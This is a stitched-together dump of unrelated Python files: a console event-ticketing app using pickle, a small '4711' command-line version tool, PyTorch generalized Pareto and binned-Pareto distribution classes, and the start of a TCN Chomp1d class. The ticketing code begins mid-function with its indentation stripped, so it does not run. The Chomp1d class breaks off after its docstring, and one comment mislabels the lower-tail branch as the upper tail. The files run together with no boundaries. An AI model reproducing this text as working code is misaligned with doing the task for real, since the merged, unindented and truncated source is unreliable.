elif ticket.getBookedSeatCount() >= ticket.gettotalticketcount():
print("Warning : All Ticket Sold Out")
input('Press Enter To Return')
else:
print("Sucess : Ticket Booked!")
input('Press Enter To Continue')
saveTicketDetails(ticket)
# Save Ticket Detials to File
def saveTicketDetails(ticket):
file = pathlib.Path("tickets.data")
if file.exists():
infile = open('tickets.data', 'rb')
if os.path.getsize(file) > 0:
oldlist = pickle.load(infile)
oldlist.append(ticket)
infile.close()
os.remove('tickets.data')
else:
oldlist = [ticket]
else:
oldlist = [ticket]
outfile = open('tempTicket.data', 'wb')
pickle.dump(oldlist, outfile)
outfile.close()
os.rename('tempTicket.data', 'tickets.data')
# Display Saved Ticket Details
def getTicketDetails():
file = pathlib.Path("tickets.data")
if os.path.getsize(file) > 0:
infile = open('tickets.data', 'rb')
ticketdetails = pickle.load(infile)
print("---------------TICKET DETAILS---------------------")
t = PrettyTable(['T-Ref', 'C-Name', 'C-Email', 'E-Code'])
for ticket in ticketdetails :
t.add_row([ticket.reference, ticket.name, ticket.email, ticket.event])
print(t)
infile.close()
print("--------------------------------------------------")
input('Press Enter To Return To Main Menu')
else :
print("NO TICKET RECORDS FOUND")
input('Press Enter To Return')
# Create Event Module
def createCharityEvent():
event = CharityEvent()
event.createEvent()
saveEventDetails(event)
def createPartyEvent():
event = PartyEvent()
event.createEvent()
saveEventDetails(event)
def createNetworkingEvent():
event = NetworkingEvent()
event.createEvent()
saveEventDetails(event)
def createWorkshopEvent():
event = WorkshopEvent()
event.createEvent()
saveEventDetails(event)
# Save Event Details to File
def saveEventDetails(event):
file = pathlib.Path("events2.data")
if file.exists():
infile = open('events2.data', 'rb')
if os.path.getsize(file) > 0:
oldlist = pickle.load(infile)
oldlist.append(event)
infile.close()
os.remove('events2.data')
else:
oldlist = [event]
else:
oldlist = [event]
outfile = open('tempevents.data', 'wb')
pickle.dump(oldlist, outfile)
outfile.close()
os.rename('tempevents.data', 'events2.data')
# Display All Event Details
def getEventsDetails():
file = pathlib.Path("events2.data")
if file.exists ():
infile = open('events2.data','rb')
if os.path.getsize(file) > 0:
eventsdetails = pickle.load(infile)
print("---------------EVENT DETAILS---------------------")
t = PrettyTable(['E-Name', 'E-Code', 'E-Total-Seats', 'E-Type'])
for events in eventsdetails :
t.add_row([events.eventname, events.eventcode, events.eventTotalAvaibleSeat, events.eventType])
print(t)
infile.close()
print("--------------------------------------------------")
input('Press Enter To Return To Main Menu')
else:
print("NO EVENTS RECORDS FOUND")
input('Press Enter To Return')
else :
print("NO EVENTS RECORDS FOUND")
input('Press Enter To Return')
# Display Reports About Events
def getEventsSummary():
filetickets = pathlib.Path("tickets.data")
if os.path.getsize(filetickets) > 0 :
infiletickets = open('tickets.data', 'rb')
ticketdetails = pickle.load(infiletickets)
fileEvents = pathlib.Path("events2.data")
if fileEvents.exists ():
infileEvents = open('events2.data','rb')
eventdetails = pickle.load(infileEvents)
print("---------------REPORTS---------------------")
for events in eventdetails :
print("\n\nEvent Name : " + events.eventname + " | Total Seats : " + events.eventTotalAvaibleSeat + " \n")
for ticket in ticketdetails:
if events.eventcode == ticket.event:
print(ticket.reference, "\t", ticket.name, "\t", ticket.email)
infileEvents.close()
infiletickets.close()
print("--------------------------------------------------")
input('Press Enter To Return To Main Menu')
else :
print("NO EVENTS RECORDS FOUND")
input('Press Enter To Return')
else:
print("NO EVENTS RECORDS FOUND")
input('Press Enter To Return')
def createEvents():
    """Show the event-creation sub-menu in a loop.

    Dispatches to the per-type creation helpers; option 5 returns to the
    caller (the main menu).
    """
    # The original looped on ``while ch != 8`` where ch is a *string*, so
    # the condition was always true; an explicit infinite loop with a
    # ``return`` on option 5 says what actually happens.
    while True:
        print("\t\t\t\t-----------------------")
        print("\t\t\t\tEVENT MANAGEMENT SYSTEM")
        print("\t\t\t\t-----------------------")
        print("\tEVENT CREATION MENU")
        print("\t1. CREATE CHARITY EVENT")
        print("\t2. CREATE NETWORKING EVENT")
        print("\t3. CREATE PARTY EVENT")
        print("\t4. CREATE WORKSHOP EVENT")
        print("\t5. BACK TO MAIN MENU")
        print("\tSelect Your Option (1-5) ")
        ch = input()
        if ch == '1':
            createCharityEvent()
        elif ch == '2':
            createNetworkingEvent()
        elif ch == '3':
            createPartyEvent()
        elif ch == '4':
            createWorkshopEvent()
        elif ch == '5':
            # Return to mainMenu()'s own loop instead of calling
            # mainMenu() recursively: the original grew the call stack on
            # every round trip between the two menus.
            return
def mainMenu():
    """Top-level interactive menu loop.

    Repeatedly prints the main menu and dispatches to the booking,
    ticket-listing, event-creation and summary screens based on the
    user's choice. There is no quit option; the loop ends only when the
    process is interrupted.
    """
    ch = ''
    num = 0  # NOTE(review): unused; kept for byte-compatibility
    # NOTE(review): ch is read from input() and is therefore a *string*,
    # so it can never equal the int 8 — this loop is effectively
    # ``while True``.
    while ch != 8:
        print("\t\t\t\t-----------------------")
        print("\t\t\t\tEVENT MANAGEMENT SYSTEM")
        print("\t\t\t\t-----------------------")
        print("\tMAIN MENU")
        print("\t1. BOOK TICKET")
        print("\t2. VIEW TICKETS")
        print("\t3. CREATE EVENT")
        print("\t4. VIEW EVENTS")
        print("\t5. SHOW SUMMARY")
        print("\tSelect Your Option (1-5) ")
        ch = input()
        # Dispatch on the raw menu choice; any other input re-displays
        # the menu.
        if ch == '1':
            bookEventTicket()
        elif ch == '2':
            getTicketDetails()
        elif ch == '3':
            createEvents()
        elif ch == '4':
            getEventsDetails()
        elif ch == '5':
            getEventsSummary()
###################################################### Start Program
if __name__ == '__main__':
    # Script entry point: start the interactive main menu loop.
    mainMenu()
import datetime
import inspect
import operator
import os
import platform
import re
import sys
from functools import reduce
from .__version__ import __version__
def cli(argv=None):
    """Entry point for the ``4711`` command-line tool.

    Parses ``argv`` (defaulting to ``sys.argv``) for the ``help`` and
    ``version`` commands and their short/long option aliases, prints the
    requested output, and terminates the process via ``sys.exit`` — this
    function never returns normally once a command is handled.
    """
    if argv is None:
        argv = sys.argv

    # Under pytest, ignore the test runner's own argv entirely.
    if argv[0].endswith("pytest"):  # pragma: no cover
        argv = ["4711"]

    # argv[0] is the invoked executable; remembered for the version output.
    process_name = str(argv[0]) if argv and isinstance(argv, list) and len(argv) >= 1 else "4711"
    argv = argv[1:] if argv and isinstance(argv, list) and len(argv) > 1 else []
    if argv:
        # Split "--opt=value" tokens into separate "--opt" / "value" items,
        # strip whitespace, and drop empty strings.
        argv = list(
            filter(lambda x: x.strip(), map(lambda x: x.strip(), reduce(operator.concat, [x.split("=") for x in argv])))
        )

    command = None
    # Command implied by an option alias (e.g. "-v" implies "version").
    optioned_command = None
    available_commands = ("help", "version")
    # Maps each option alias to its canonical command, canonical spelling,
    # and how many following argv items it consumes as values.
    available_pre_command_options = {
        "-h": {"command": "help", "option": "--help", "values": 0},
        "--help": {"command": "help", "option": "--help", "values": 0},
        "-v": {"command": "version", "option": "--version", "values": 0},
        "-V": {"command": "version", "option": "--version", "values": 0},
        "--version": {"command": "version", "option": "--version", "values": 0},
    }
    option_values = []
    values = []
    value_count = 0

    for i, arg in enumerate(argv):
        # If a previous option declared pending values, consume them first.
        if value_count:
            values.append(arg)
            value_count -= 1
            if value_count == 0:
                option_values.append(values)
                if command:
                    break
        if arg in available_pre_command_options:
            info = available_pre_command_options[arg]
            if not optioned_command and info.get("command"):
                optioned_command = info.get("command")
            elif optioned_command and info.get("command") and info.get("command") != optioned_command:
                # Two option aliases implying different commands.
                print("Something went wrong - conflicting options and/or commands")
                sys.exit(1)
            value_count = info.get("values")
            values = [info.get("option")]
            continue
        elif arg not in available_pre_command_options and arg.startswith("-"):
            print(f"Something went wrong - invalid option: {arg}")
            sys.exit(1)
        elif arg in available_commands:
            if optioned_command and optioned_command != arg:
                # Explicit command contradicts the command implied by options.
                print("Something went wrong - conflicting options and/or commands")
                sys.exit(1)
            command = arg

    # No explicit command: fall back to the option-implied one, else help.
    if not command:
        command = optioned_command or "help"

    if command == "help":
        print("Usage: 4711 [options] <command> [...]")
        print("")
        print("Options:")
        print(" -v, --version print installed 4711 version")
        print(" -h, --help show this help message and exit")
        sys.exit(0)

    if command == "version":
        cli_version = f"CLI: 4711 / version {__version__}"
        # If invoked via a script on the stack's outermost frame, show the
        # executable path alongside the version.
        script_dir = os.path.dirname(inspect.stack()[-1][1])
        if script_dir and process_name and process_name.startswith(script_dir):
            cli_version = f'{cli_version} [exec: "{process_name}"]'
        print(cli_version)

        system_name = platform.uname().system
        if system_name == "Darwin":
            # Report "macOS <release>" rather than the Darwin kernel name.
            system_name = f"macOS {platform.mac_ver()[0]}"
        platform_line = f"Platform: {system_name} [{platform.machine()}]"
        print(platform_line)

        # Collapse the multi-line interpreter banner to one line, and drop
        # the leading version number if sys.version repeats it.
        sys_version = re.sub(r"\s+", " ", sys.version)
        if sys_version.startswith(f"{platform.python_version()} "):
            version_len = len(platform.python_version())
            sys_version = sys_version[version_len:].strip()
        python_line = f"Python: {platform.python_version()} -- {sys_version}"
        # Keep the Python line at most ~77 chars: first strip parenthesised
        # build details inside the brackets, then hard-truncate with "...",
        # re-closing the bracket if one was left open.
        if len(python_line) > 77:
            python_line = re.sub(r"(\[[^(]+) \([^)]+\)(.*)\]$", "\\1\\2]", python_line)
            if len(python_line) > 77:
                python_line = re.sub(r"[ .]+$", "", python_line[0:74])
                python_line = f"{python_line}..."
                if (python_line[::-1] + "[").index("[") < (python_line[::-1] + "]").index("]"):
                    python_line = f"{python_line}]"
        print(python_line)
        print("")
        print(f"Timestamp (now): {datetime.datetime.utcnow().isoformat()}Z")
        sys.exit(0)
if __name__ == "__main__":  # pragma: no cover
    # Allow running this module directly as a script.
    cli()  # pylint: disable=no-value-for-parameter
from numbers import Number
import torch
from torch.distributions import constraints
from torch.distributions.distribution import Distribution
from torch.distributions.utils import broadcast_all
from typing import Dict
import numpy as np
class GeneralizedPareto(Distribution):
    """Generalized Pareto distribution (GPD) with location fixed at 0.

    Parameterised by shape ``xi`` (tail heaviness) and scale ``beta``;
    support is x >= 0. ``cdf``/``icdf`` assume ``xi != 0``; ``log_prob``
    also handles the exponential limit ``xi == 0``.
    """

    def __init__(self, xi, beta, validate_args=None):
        """Generalised Pareto distribution.

        Args:
            xi (torch.Tensor): shape (tail-heaviness) parameter(s)
            beta (torch.Tensor): scale parameter(s); must be positive
            validate_args (bool): forwarded to ``Distribution.__init__``
        """
        self.xi, self.beta = broadcast_all(xi, beta)
        if isinstance(xi, Number) and isinstance(beta, Number):
            batch_shape = torch.Size()
        else:
            batch_shape = self.xi.size()
        super(GeneralizedPareto, self).__init__(
            batch_shape, validate_args=validate_args
        )
        # -beta < 0 is equivalent to beta > 0: reject non-positive scales.
        if (
            self._validate_args
            and not torch.lt(-self.beta, torch.zeros_like(self.beta)).all()
        ):
            raise ValueError("GenPareto is not defined when scale beta<=0")

    @property
    def arg_constraints(self) -> Dict[str, constraints.Constraint]:
        constraint_dict = {
            "xi": constraints.positive,
            "beta": constraints.positive,
        }
        return constraint_dict

    @property
    def mean(self):
        # Mean is beta / (1 - xi), finite only for xi < 1; NaN otherwise.
        mu = torch.where(
            self.xi < 1,
            torch.div(self.beta, 1 - self.xi),
            np.nan * torch.ones_like(self.xi),
        )
        return mu

    @property
    def variance(self):
        # Variance is beta^2 / ((1 - xi)^2 (1 - 2 xi)), finite for xi < 1/2.
        xi, beta = self.xi, self.beta
        return torch.where(
            xi < 1 / 2.0,
            torch.div(beta ** 2, torch.mul((1 - xi) ** 2, (1 - 2 * xi))),
            np.nan * torch.ones_like(xi),
        )

    @property
    def stddev(self):
        return torch.sqrt(self.variance)

    def log_prob(self, x):
        """Elementwise log density at ``x``; -inf where x < 0."""
        # Exponential limit of the GPD as xi -> 0.
        logp_exponential = -self.beta.log() - x / self.beta
        # General case; the 1e-6 guards against dividing by xi == 0
        # (that branch is discarded by the where() below anyway).
        logp_general = -self.beta.log() - (1 + 1.0 / (self.xi + 1e-6)) * torch.log(
            1 + self.xi * x / self.beta
        )
        # Elementwise selection: the original `if self.xi == 0:` raised
        # "Boolean value of Tensor ... is ambiguous" for batched xi; this
        # preserves the scalar behaviour and also works per element.
        logp = torch.where(
            self.xi == torch.zeros_like(self.xi), logp_exponential, logp_general
        )
        return torch.where(
            x < torch.zeros_like(x), -np.inf * torch.ones_like(x), logp
        )

    def cdf(self, x):
        """CDF at ``x``: 1 - (1 + xi*x/beta)^(-1/xi). Assumes xi != 0."""
        x_shifted = torch.div(x, self.beta)
        u = 1 - torch.pow(1 + self.xi * x_shifted, -torch.reciprocal(self.xi))
        return u

    def icdf(self, value):
        """Quantile function (inverse of :meth:`cdf`). Assumes xi != 0."""
        x_shifted = torch.div(torch.pow(1 - value, -self.xi) - 1, self.xi)
        x = torch.mul(x_shifted, self.beta)
        return x
import torch
import torch.nn.functional as F
from .univariate_binned import UnivariateBinned
from .generalized_pareto import GeneralizedPareto
class UnivariateSplicedBinnedPareto(UnivariateBinned):
    r"""
    Spliced Binned-Pareto univariate distribution.

    The body of the distribution is the binned density inherited from
    ``UnivariateBinned``; everything beyond the ``percentile_gen_pareto``
    quantile on each side is modelled by a separate generalized Pareto
    distribution (GPD), one per tail.

    Arguments
    ----------
    bins_lower_bound: The lower bound of the bin edges
    bins_upper_bound: The upper bound of the bin edges
    nbins: The number of equidistance bins to allocate between `bins_lower_bound` and `bins_upper_bound`. Default value is 100.
    percentile_gen_pareto: The percentile of the distribution that is each tail. Default value is 0.05. NB: This symmetric percentile can still represent asymmetric upper and lower tails.
    """

    def __init__(
        self,
        bins_lower_bound: float,
        bins_upper_bound: float,
        nbins: int = 100,
        percentile_gen_pareto: torch.Tensor = torch.tensor(0.05),
        validate_args=None,
    ):
        super().__init__(
            bins_lower_bound, bins_upper_bound, nbins, validate_args
        )

        assert (
            percentile_gen_pareto > 0 and percentile_gen_pareto < 1
        ), "percentile_gen_pareto must be between (0,1)"
        self.percentile_gen_pareto = percentile_gen_pareto

        # Learnable GPD parameters (xi = shape, beta = scale) for the
        # lower tail, initialised at 0.5 each.
        self.lower_xi = torch.nn.Parameter(torch.tensor(0.5))
        self.lower_beta = torch.nn.Parameter(torch.tensor(0.5))
        self.lower_gen_pareto = GeneralizedPareto(self.lower_xi, self.lower_beta)

        # Learnable GPD parameters for the upper tail.
        self.upper_xi = torch.nn.Parameter(torch.tensor(0.5))
        self.upper_beta = torch.nn.Parameter(torch.tensor(0.5))
        self.upper_gen_pareto = GeneralizedPareto(self.upper_xi, self.upper_beta)

        # Per-batch tail parameters; populated by forward() when the
        # distribution's parameters are predicted by an upstream network,
        # and indexed by ``self.idx`` during log_p().
        self.lower_xi_batch = None
        self.lower_beta_batch = None
        self.upper_xi_batch = None
        self.upper_beta_batch = None

    def to_device(self, device):
        """
        Moves members to a specified torch.device
        """
        self.device = device
        self.bin_min = self.bin_min.to(device)
        self.bin_max = self.bin_max.to(device)
        self.bin_edges = self.bin_edges.to(device)
        self.bin_widths = self.bin_widths.to(device)
        self.bin_centres = self.bin_centres.to(device)
        self.logits = self.logits.to(device)

    def forward(self, x):
        """
        Takes input x as the new parameters to specify the bin probabilities: logits for the base distribution, and xi and beta for each tail distribution.
        """
        # Layout of x: [nbins logits | lower_xi | lower_beta | upper_xi |
        # upper_beta]; softplus keeps the tail parameters positive.
        if len(x.shape) > 1:
            # If mini-batching
            self.logits = x[:, : self.nbins]
            self.lower_xi_batch = F.softplus(x[:, self.nbins])
            self.lower_beta_batch = F.softplus(x[:, self.nbins + 1])

            self.upper_xi_batch = F.softplus(x[:, self.nbins + 2])
            self.upper_beta_batch = F.softplus(x[:, self.nbins + 3])
        else:
            # If not mini-batching
            self.logits = x[: self.nbins]
            self.lower_xi_batch = F.softplus(x[self.nbins])
            self.lower_beta_batch = F.softplus(x[self.nbins + 1])

            self.upper_xi_batch = F.softplus(x[self.nbins + 2])
            self.upper_beta_batch = F.softplus(x[self.nbins + 3])

        self.upper_gen_pareto.xi = self.upper_xi_batch
        self.upper_gen_pareto.beta = self.upper_beta_batch
        self.lower_gen_pareto.xi = self.lower_xi_batch
        self.lower_gen_pareto.beta = self.lower_beta_batch

        return self.logits

    def log_p(self, xx, for_training=True):
        """
        Arguments
        ----------
        xx: one datapoint
        for_training: boolean to indicate a return of the log-probability, or of the loss (which is an adjusted log-probability)
        """
        assert xx.shape.numel() == 1, "log_p() expects univariate"

        # Compute upper and lower tail thresholds at current time from their percentiiles
        upper_percentile = self.icdf(1 - self.percentile_gen_pareto)
        lower_percentile = self.icdf(self.percentile_gen_pareto)

        # Log-prob given binned distribution
        # (scaled by the mass left to the body: 1 - 2 * tail percentile)
        logp_bins = self.log_binned_p(xx) + torch.log(
            1 - 2 * self.percentile_gen_pareto
        )
        logp = logp_bins

        # Log-prob given upper tail distribution
        if xx > upper_percentile:
            # NOTE(review): indexing with self.idx assumes log_prob() set
            # it for the current mini-batch element — confirm call order.
            if self.upper_xi_batch is not None:
                # self.upper_gen_pareto.xi = torch.square(self.upper_xi_batch[self.idx])
                # self.upper_gen_pareto.beta = torch.square(self.upper_beta_batch[self.idx])
                self.upper_gen_pareto.xi = self.upper_xi_batch[self.idx]
                self.upper_gen_pareto.beta = self.upper_beta_batch[self.idx]
            logp_gen_pareto = self.upper_gen_pareto.log_prob(
                xx - upper_percentile
            ) + torch.log(self.percentile_gen_pareto)
            logp = logp_gen_pareto
            # During training the binned term is added so gradients also
            # flow into the body's logits for tail observations.
            if for_training:
                logp += logp_bins

        # Log-prob given upper tail distribution
        elif xx < lower_percentile:
            if self.lower_xi_batch is not None:
                # self.lower_gen_pareto.xi = torch.square(self.lower_xi_batch[self.idx])
                # self.lower_gen_pareto.beta = torch.square(self.lower_beta_batch[self.idx])
                self.lower_gen_pareto.xi = self.lower_xi_batch[self.idx]
                self.lower_gen_pareto.beta = self.lower_beta_batch[self.idx]
            logp_gen_pareto = self.lower_gen_pareto.log_prob(
                lower_percentile - xx
            ) + torch.log(self.percentile_gen_pareto)
            logp = logp_gen_pareto
            if for_training:
                logp += logp_bins

        return logp

    def cdf_components(self, xx, idx=0, cum_density=torch.tensor([0.0])):
        """
        Cumulative density for one datapoint `xx`, where `cum_density` is the cdf up to bin_edges `idx` which must be lower than `xx`
        """
        bin_cdf_relative = torch.tensor([0.0])
        upper_percentile = self.icdf(1 - self.percentile_gen_pareto)
        lower_percentile = self.icdf(self.percentile_gen_pareto)
        if xx < lower_percentile:
            # Lower tail: survival of the mirrored GPD, scaled by the
            # tail mass.
            adjusted_xx = lower_percentile - xx
            cum_density = (
                1.0 - self.lower_gen_pareto.cdf(adjusted_xx)
            ) * self.percentile_gen_pareto
        elif xx <= upper_percentile:
            # Body: delegate to the binned CDF machinery.
            idx, cum_density, bin_cdf_relative = self.cdf_binned_components(
                xx, idx, cum_density
            )
        else:
            # Upper tail: body mass plus the GPD's CDF of the exceedance.
            adjusted_xx = xx - upper_percentile
            cum_density = (
                1.0 - self.percentile_gen_pareto
            ) + self.upper_gen_pareto.cdf(
                adjusted_xx
            ) * self.percentile_gen_pareto
        return idx, cum_density, bin_cdf_relative

    def inverse_cdf(self, value):
        """
        Inverse cdf of a single percentile `value`
        """
        assert (
            value >= 0.0 and value <= 1.0
        ), "percentile value must be between 0 and 1 inclusive"

        if value < self.percentile_gen_pareto:
            # Lower tail: reflect the GPD quantile below the body's
            # lower threshold.
            adjusted_percentile = 1 - (value / self.percentile_gen_pareto)
            icdf_value = self.inverse_binned_cdf(
                self.percentile_gen_pareto
            ) - self.lower_gen_pareto.icdf(adjusted_percentile)
        elif value <= 1 - self.percentile_gen_pareto:
            # Body: plain binned inverse CDF.
            icdf_value = self.inverse_binned_cdf(value)
        else:
            # Upper tail: GPD quantile above the body's upper threshold.
            adjusted_percentile = (
                value - (1.0 - self.percentile_gen_pareto)
            ) / self.percentile_gen_pareto
            icdf_value = self.upper_gen_pareto.icdf(
                adjusted_percentile
            ) + self.inverse_binned_cdf(1 - self.percentile_gen_pareto)

        return icdf_value
import torch
import torch.nn.functional as F
from typing import List, Union, Optional
import numpy as np
class UnivariateBinned(torch.nn.Module):
    r"""
    Binned univariate distribution designed as an nn.Module

    The density is piecewise-constant over ``nbins`` equidistant bins;
    bin probabilities are parameterised by ``self.logits``.

    Arguments
    ----------
    bins_lower_bound: The lower bound of the bin edges
    bins_upper_bound: The upper bound of the bin edges
    nbins: The number of equidistant bins to allocate between `bins_lower_bound` and `bins_upper_bound`. Default value is 100.
    smoothing_indicator: The method of smoothing to perform on the bin probabilities
    """

    def __init__(
        self,
        bins_lower_bound: float,
        bins_upper_bound: float,
        nbins: int = 100,
        smoothing_indicator: Optional[str] = [None, "cheap", "kernel"][1],
        validate_args=None,
    ):
        # NOTE(review): the list-indexing default above evaluates to
        # "cheap"; and despite the `float` annotations, the asserts below
        # require the two bounds to be 1-element torch.Tensors.
        super().__init__()

        assert (
            bins_lower_bound.shape.numel() == 1
        ), f"bins_lower_bound needs to have shape torch.Size([1])"
        assert (
            bins_upper_bound.shape.numel() == 1
        ), f"bins_upper_bound needs to have shape torch.Size([1])"
        assert (
            bins_lower_bound < bins_upper_bound
        ), f"bins_lower_bound {bins_lower_bound} needs to less than bins_upper_bound {bins_upper_bound}"

        self.nbins = nbins
        self.epsilon = np.finfo(np.float32).eps
        self.smooth_indicator = smoothing_indicator

        # Creation the bin locations
        # Bins locations are placed uniformly between bins_lower_bound and bins_upper_bound, though more complex methods could be used
        # The bounds are widened by a few float32 epsilons so boundary
        # values fall strictly inside the outermost bins.
        self.bin_min = bins_lower_bound - self.epsilon * 6
        self.bin_max = bins_upper_bound + self.epsilon * 6
        self.bin_edges = torch.linspace(self.bin_min, self.bin_max, nbins + 1)
        self.bin_widths = self.bin_edges[1:] - self.bin_edges[:-1]
        self.bin_centres = (self.bin_edges[1:] + self.bin_edges[:-1]) * 0.5

        # Initialise logits to a (near-)uniform density over the bins.
        logits = torch.ones(nbins)
        logits = (
            logits / logits.sum() / (1 + self.epsilon) / self.bin_widths.mean()
        )
        self.logits = torch.log(logits)

        # Keeps track of mini-batches
        self.idx = None
        self.device = None

    def to_device(self, device):
        """
        Moves members to a specified torch.device
        """
        self.device = device
        self.bin_min = self.bin_min.to(device)
        self.bin_max = self.bin_max.to(device)
        self.bin_edges = self.bin_edges.to(device)
        self.bin_widths = self.bin_widths.to(device)
        self.bin_centres = self.bin_centres.to(device)

    def forward(self, x):
        """
        Takes input x as new logits
        """
        self.logits = x
        return self.logits

    def log_bins_prob(self):
        # Softmax normalises the logits to bin masses; dividing by the bin
        # widths (subtracting their log) converts masses to densities.
        if self.idx is None:
            log_bins_prob = F.log_softmax(self.logits, dim=0).sub(
                torch.log(self.bin_widths)
            )
        else:
            # Mini-batch mode: use only the current element's logits row.
            log_bins_prob = F.log_softmax(self.logits[self.idx, :], dim=0).sub(
                torch.log(self.bin_widths)
            )
        return log_bins_prob.float()

    def bins_prob(self):
        # Per-bin density values (exp of log densities).
        bins_prob = self.log_bins_prob().exp()
        return bins_prob

    def bins_cdf(self):
        # CDF evaluated at every bin edge (length nbins + 1, starting at 0).
        incomplete_cdf = self.bins_prob().mul(self.bin_widths).cumsum(dim=0)
        zero = 0 * incomplete_cdf[0].view(1)  # ensured to be on same device
        return torch.cat((zero, incomplete_cdf))

    def log_binned_p(self, xx):
        """
        Log probability for one datapoint.
        """
        assert xx.shape.numel() == 1, "log_binned_p() expects univariate"

        # Transform xx in to a one-hot encoded vector to get bin location
        # (product of signed distances to both edges is >= 0 only inside
        # the containing bin).
        vect_above = xx - self.bin_edges[1:]
        vect_below = self.bin_edges[:-1] - xx
        one_hot_bin_indicator = (vect_above * vect_below >= 0).float()

        # Values outside the binned support are clamped to the outermost bin.
        if xx > self.bin_edges[-1]:
            one_hot_bin_indicator[-1] = 1.0
        elif xx < self.bin_edges[0]:
            one_hot_bin_indicator[0] = 1.0

        if not (one_hot_bin_indicator == 1).sum() == 1:
            print(
                f"Warning in log_p(self, xx): for xx={xx.item()}, one_hot_bin_indicator value_counts are {one_hot_bin_indicator.unique(return_counts=True)}"
            )

        if self.smooth_indicator == "kernel":
            # The kernel variant is better but slows down training quite a bit
            # (spreads the indicator over 7 bins with Gaussian-like weights).
            idx_one_hot = torch.argmax(one_hot_bin_indicator)
            kernel = [0.006, 0.061, 0.242, 0.383, 0.242, 0.061, 0.006]
            len_kernel = len(kernel)
            for i in range(len_kernel):
                idx = i - len_kernel // 2 + idx_one_hot
                if idx in range(len(one_hot_bin_indicator)):
                    one_hot_bin_indicator[idx] = kernel[i]

        elif self.smooth_indicator == "cheap":
            # This variant is cheaper in computation time
            # (fixed 0.5 / 0.25 weights on the two nearest neighbours each side).
            idx_one_hot = torch.argmax(one_hot_bin_indicator)
            if not idx_one_hot + 1 >= len(one_hot_bin_indicator):
                one_hot_bin_indicator[idx_one_hot + 1] = 0.5
            if not idx_one_hot - 1 < 0:
                one_hot_bin_indicator[idx_one_hot - 1] = 0.5
            if not idx_one_hot + 2 >= len(one_hot_bin_indicator):
                one_hot_bin_indicator[idx_one_hot + 2] = 0.25
            if not idx_one_hot - 2 < 0:
                one_hot_bin_indicator[idx_one_hot - 2] = 0.25

        logp = torch.dot(one_hot_bin_indicator, self.log_bins_prob())
        return logp

    def log_p(self, xx):
        """
        Log probability for one datapoint `xx`.
        """
        assert xx.shape.numel() == 1, "log_p() expects univariate"
        return self.log_binned_p(xx)

    def log_prob(self, x):
        """
        Log probability for a tensor of datapoints `x`.
        """
        x = x.view(x.shape.numel())
        # self.idx selects the matching logits row per element in
        # mini-batch mode; it is reset to None on exit.
        self.idx = 0
        if x.shape[0] == 1:
            self.idx = None

        lpx = self.log_p(x[0]).view(1)

        if x.shape.numel() == 1:
            return lpx

        for xx in x[1:]:
            self.idx += 1
            lpxx = self.log_p(xx).view(1)
            lpx = torch.cat((lpx, lpxx), 0)
        self.idx = None

        return lpx

    def cdf_binned_components(
        self, xx, idx=0, cum_density=torch.tensor([0.0])
    ):
        """
        Cumulative density given bins for one datapoint `xx`, where `cum_density` is the cdf up to bin_edges `idx` which must be lower than `xx`
        """
        assert xx.shape.numel() == 1, "cdf_components() expects univariate"

        bins_range = self.bin_edges[-1] - self.bin_edges[0]
        bin_cdf_relative = torch.tensor([0.0])
        if idx == 0:
            cum_density = torch.tensor([0.0])

        # Walk bins left-to-right, accumulating full-bin mass until the
        # bin containing xx is reached; its partial mass is returned
        # separately in bin_cdf_relative.
        while xx > self.bin_edges[idx] and idx < self.nbins:
            bin_width = self.bin_edges[idx + 1] - self.bin_edges[idx]
            if xx < self.bin_edges[idx + 1]:
                bin_cdf = torch.distributions.uniform.Uniform(
                    self.bin_edges[idx], self.bin_edges[idx + 1]
                ).cdf(xx)
                bin_cdf_relative = bin_cdf * bin_width / bins_range
                break
            else:
                cum_density += self.bins_prob()[idx] * bin_width
                idx += 1

        return idx, cum_density, bin_cdf_relative

    def cdf_components(self, xx, idx=0, cum_density=torch.tensor([0.0])):
        """
        Cumulative density for one datapoint `xx`, where `cum_density` is the cdf up to bin_edges `idx` which must be lower than `xx`
        """
        return self.cdf_binned_components(xx, idx, cum_density)

    def cdf(self, x):
        """
        Cumulative density tensor for a tensor of datapoints `x`.
        """
        x = x.view(x.shape.numel())

        # Sort inputs so the bin walk can resume from the previous index;
        # results are un-sorted back to the caller's order at the end.
        sorted_x = x.sort()
        x, unsorted_index = sorted_x.values, sorted_x.indices

        idx, cum_density, bin_cdf_relative = self.cdf_components(
            x[0], idx=0, cum_density=torch.tensor([0.0])
        )
        cdf_tensor = (cum_density + bin_cdf_relative).view(1)
        if x.shape.numel() == 1:
            return cdf_tensor

        for xx in x[1:]:
            idx, cum_density, bin_cdf_relative = self.cdf_components(
                xx, idx, cum_density
            )
            cdfx = (cum_density + bin_cdf_relative).view(1)
            cdf_tensor = torch.cat((cdf_tensor, cdfx), 0)

        cdf_tensor = cdf_tensor[unsorted_index]
        return cdf_tensor

    def inverse_binned_cdf(self, value):
        """
        Inverse binned cdf of a single quantile `value`
        """
        assert (
            value.shape.numel() == 1
        ), "inverse_binned_cdf() expects univariate"
        if value == 0.0:
            return self.bin_edges[0]
        if value == 1:
            return self.bin_edges[-1]

        vect_above = value - self.bins_cdf()[1:]
        vect_below = self.bins_cdf()[:-1] - value

        if (vect_above == 0).any():
            # value coincides with a bin edge's CDF exactly.
            result = self.bin_edges[1:][vect_above == 0]
        elif (vect_below == 0).any():
            result = self.bin_edges[:-1][vect_below == 0]
        else:
            # Interpolate linearly within the containing bin.
            one_hot_edge_indicator = vect_above * vect_below >= 0  # .float()
            low = self.bin_edges[:-1][one_hot_edge_indicator]
            high = self.bin_edges[1:][one_hot_edge_indicator]
            value_relative = (
                value - self.bins_cdf()[:-1][one_hot_edge_indicator]
            )
            result = torch.distributions.uniform.Uniform(low, high).icdf(
                value_relative
            )
        return result

    def inverse_cdf(self, value):
        """
        Inverse cdf of a single percentile `value`
        """
        return self.inverse_binned_cdf(value)

    def icdf(self, values):
        """
        Inverse cdf of a tensor of quantile `values`
        """
        if self.device is not None:
            values = values.to(self.device)
        values = values.view(values.shape.numel())
        icdf_tensor = self.inverse_cdf(values[0])
        icdf_tensor = icdf_tensor.view(1)

        if values.shape.numel() == 1:
            return icdf_tensor

        for value in values[1:]:
            icdf_value = self.inverse_cdf(value).view(1)
            icdf_tensor = torch.cat((icdf_tensor, icdf_value), 0)

        return icdf_tensor
import torch.nn as nn
from torch.nn.utils import weight_norm
class Chomp1d(nn.Module):
    def __init__(self, chomp_size):
        """Remove trailing padding from a causal Conv1d output.

        Source: https://github.com/locuslab/TCN/blob/8845f88f31def1e7ffccb8811ea966e9f58d9695/TCN/tcn.py

        Args:
            chomp_size (int): number of trailing time steps to drop
                (the amount of left padding added by the convolution).
        """
